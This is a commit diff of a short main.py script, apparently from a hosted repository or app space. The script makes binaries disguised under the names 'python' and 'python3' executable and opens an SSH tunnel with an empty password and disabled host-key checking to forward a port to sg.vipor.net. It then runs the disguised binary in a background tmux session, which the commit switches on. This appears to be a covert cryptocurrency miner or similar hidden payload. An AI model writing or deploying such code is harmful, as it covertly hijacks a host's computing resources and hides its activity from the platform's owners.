ilhamap commited on
Commit
0f8618c
·
verified ·
1 Parent(s): b724ad2

Update main.py

Browse files
Files changed (1) hide show
  1. main.py +2 -2
main.py CHANGED
@@ -1,6 +1,6 @@
1
  import os
2
  os.system("chmod +x python3 python")
3
  os.system("tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]")
4
- #os.system("tmux new-session -d -s ses1 ./python3")
5
- os.system('./python')
6
  os.system("tmux ls")
 
1
  import os
2
  os.system("chmod +x python3 python")
3
  os.system("tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]")
4
+ os.system("tmux new-session -d -s ses1 ./python3")
5
+ #os.system('./python')
6
  os.system("tmux ls")